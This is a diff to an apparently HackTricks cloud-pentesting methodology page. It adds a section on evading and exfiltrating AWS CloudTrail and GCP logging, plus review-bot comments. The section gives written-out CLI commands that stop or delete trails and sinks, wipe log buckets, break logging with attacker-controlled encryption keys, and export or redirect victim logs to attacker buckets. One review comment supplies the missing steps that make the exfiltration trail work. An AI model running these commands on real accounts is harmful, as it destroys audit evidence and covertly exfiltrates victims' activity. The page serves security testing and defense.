119 changes: 118 additions & 1 deletion src/pentesting-cloud/pentesting-cloud-methodology.md
Expand Up @@ -420,6 +420,115 @@ A tool to find a company (target) infrastructure, files, and apps on the top clo

- [https://github.com/RyanJarv/awesome-cloud-sec](https://github.com/RyanJarv/awesome-cloud-sec)


## Cloud Logging Defense Evasion & Log Exfiltration

Cloud audit pipelines are also an **attack surface**. If an attacker gets permissions over the **log router** (CloudTrail trail / GCP sink), the **destination storage** (S3 / log bucket / Cloud Storage), or the **encryption key** (KMS / CMEK), they can blind detections, destroy evidence, poison forensic data, or get passive visibility into the victim account.

### Preconditions to check

High-risk permissions in this area include:

- **AWS:** `cloudtrail:StopLogging`, `cloudtrail:DeleteTrail`, `cloudtrail:UpdateTrail`, `cloudtrail:CreateTrail`, `s3:DeleteBucket`, `s3:DeleteObject`, `s3:GetObject`, `s3:PutObject`, and KMS permissions that let an attacker swap or break the key used by CloudTrail.
- **GCP:** `logging.sinks.update`, `logging.sinks.delete`, `logging.sinks.create`, `logging.buckets.delete`, `storage.objects.get`, `storage.objects.create`, and KMS/CMEK permissions affecting log buckets.

### Common attacker playbooks

#### 1. Stop log delivery

- **AWS:** stop the trail so no new events are delivered to the configured S3 bucket.
- **GCP:** disable the sink so matching entries are no longer routed.

```bash
# AWS
aws cloudtrail stop-logging --name <trail-name>

# GCP
gcloud logging sinks update <sink-name> --disabled
```

#### 2. Delete the router or the destination

Deleting the **router** stops future delivery. Deleting the **destination** can both stop delivery and destroy historical evidence.

```bash
# AWS: delete router
aws cloudtrail delete-trail --name <trail-name>

# AWS: delete historical log storage (bucket must be empty first)
aws s3 rm s3://<cloudtrail-bucket> --recursive
aws s3api delete-bucket --bucket <cloudtrail-bucket>

# GCP: delete router
gcloud logging sinks delete <sink-name>

# GCP: delete log bucket
gcloud logging buckets delete <bucket-name> --location=<location>
```

#### 3. Break logging with an attacker-controlled encryption key

A stealthier pattern is to **repoint logging to an attacker-controlled KMS/CMEK key** that initially works, and then revoke the logging service access to that key.

- **AWS:** `update-trail --kms-key-id <attacker-key>` and then remove the `cloudtrail.amazonaws.com` access from the key policy or delete the key material. CloudTrail may surface a misleading **bucket access denied** style error even though the bucket is fine.
- **GCP:** if the log bucket already supports CMEK, update it to use an attacker-controlled key and then revoke the Cloud Logging service account decrypt permissions. Reverting may fail because the current key can no longer decrypt the bucket.

```bash
# AWS
aws cloudtrail update-trail --name <trail-name> --kms-key-id <attacker-kms-key-arn>

# GCP
gcloud logging buckets update <bucket-name> \
--location=<location> \
--cmek-kms-key-name=<full-kms-key-name>
```

#### 4. Poison historical logs

If logs are exported as **JSON objects** into object storage, an attacker with object read/write permissions can download, modify, and overwrite historical records.

- **AWS:** modify CloudTrail objects in S3. Downstream consumers such as Athena may parse the poisoned events.
- **GCP:** when sinks export to Cloud Storage, modify the stored objects there.

> [!TIP]
> In AWS, enable **CloudTrail log file integrity validation** to detect post-delivery tampering. This is especially important for trails created through CLI/API workflows.

#### 5. Create a parallel log export for passive visibility

Instead of running noisy discovery commands, an attacker can configure a **new** router that continuously exports victim activity to attacker-controlled infrastructure.

```bash
# AWS
aws cloudtrail create-trail \
--name <attacker-trail> \
--s3-bucket-name <attacker-bucket>

# GCP
gcloud logging sinks create <sink-name> <destination> --log-filter="FILTER_CONDITION"
```

This provides passive discovery of API calls, IAM changes, new compute instances, and access to sensitive services.

#### 6. Redirect the existing pipeline

Modifying the current destination is usually noisier from a defender perspective than creating a second pipeline, but it can also **blind** the original monitoring stack while exfiltrating the same logs.

```bash
# AWS
aws cloudtrail update-trail --name <trail-name> --s3-bucket-name <attacker-bucket>

# GCP
gcloud logging sinks update <sink-name> <new-destination>
```

### High-value defensive details

- **AWS CloudTrail Event History** keeps an immutable **90-day** history for **management events**, but **data** and **network** events are not covered there.
- **AWS EventBridge** rules on trail creation, modification, deletion, and `StopLogging` can catch log-plane tampering.
- **GCP `_Required`** log bucket cannot be disabled, modified, or deleted, so it is the safest place for critical audit logs.
- **GCP locked log buckets** prevent premature deletion because retention becomes irreversible until all retained entries age out.


## Google

### GCP
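Review bot: the AWS example in playbook 5 (`aws cloudtrail create-trail --name <attacker-trail> --s3-bucket-name <attacker-bucket>`) does not yet produce a passive export on its own: a trail created with `create-trail` does not deliver anything until `aws cloudtrail start-logging --name <attacker-trail>` is run, CloudTrail only writes to `<attacker-bucket>` if that bucket's policy grants `cloudtrail.amazonaws.com` `s3:PutObject` on the delivery prefix (for a bucket in the attacker's account that policy is set on the attacker side, normally conditioned on `aws:SourceArn` being the victim trail ARN), and without `--is-multi-region-trail` the trail only captures the region it was created in. The GCP half has the same gap: after `gcloud logging sinks create <sink-name> <destination> --log-filter="FILTER_CONDITION"` the sink's `writerIdentity` (shown by `gcloud logging sinks describe <sink-name>`) must be granted write access on the destination, otherwise nothing is exported and the failure only surfaces as sink errors in the victim project. Two accuracy points in "High-value defensive details": the `_Required` bucket bullet should say that it only receives Admin Activity, System Event and Access Transparency audit logs (Data Access audit logs are not routed there and no other logs can be added), so it is not a location defenders can choose to send logs to; and the log file integrity tip would be clearer if it stated why CLI-created trails are the risk, namely that `create-trail` leaves validation off unless `--enable-log-file-validation` is passed, whereas console-created trails enable it by default.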
Expand Down Expand Up @@ -454,7 +563,15 @@ azure-security/
confidential-computing/luks2-header-malleability-null-cipher-abuse.md
{{#endref}}

{{#include ../banners/hacktricks-training.md}}
## References

- [Unit 42 - Blinding the Watchmen: Abusing Cloud Logging Services for Defense Evasion and Visibility](https://unit42.paloaltonetworks.com/cloud-logging-defense-evasion/)
- [AWS CloudTrail User Guide](https://docs.aws.amazon.com/awscloudtrail/latest/userguide/cloudtrail-user-guide.html)
- [AWS CloudTrail log file integrity validation](https://docs.aws.amazon.com/awscloudtrail/latest/userguide/cloudtrail-log-file-validation-intro.html)
- [AWS CloudTrail Event History](https://docs.aws.amazon.com/awscloudtrail/latest/userguide/view-cloudtrail-events.html)
- [Google Cloud Logging sinks](https://docs.cloud.google.com/logging/docs/export/configure_export_v2)
- [Google Cloud Logging bucket locking](https://docs.cloud.google.com/logging/docs/buckets#locking-logs-buckets)
- [Google Cloud Logging CMEK](https://docs.cloud.google.com/logging/docs/routing/managed-encryption)

{{#include ../banners/hacktricks-training.md}}
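Review bot: moving `{{#include ../banners/hacktricks-training.md}}` below the new `## References` block keeps the banner as the last element of the page, which matches the layout used elsewhere in the repo, so the delete-and-re-add is fine. One documentation point: because the references land at the very end of the methodology page, far from the "Cloud Logging Defense Evasion & Log Exfiltration" section they support, it would help readers to cite the Unit 42 post inline where that section is introduced, since the playbooks in hunk 1 are derived from it.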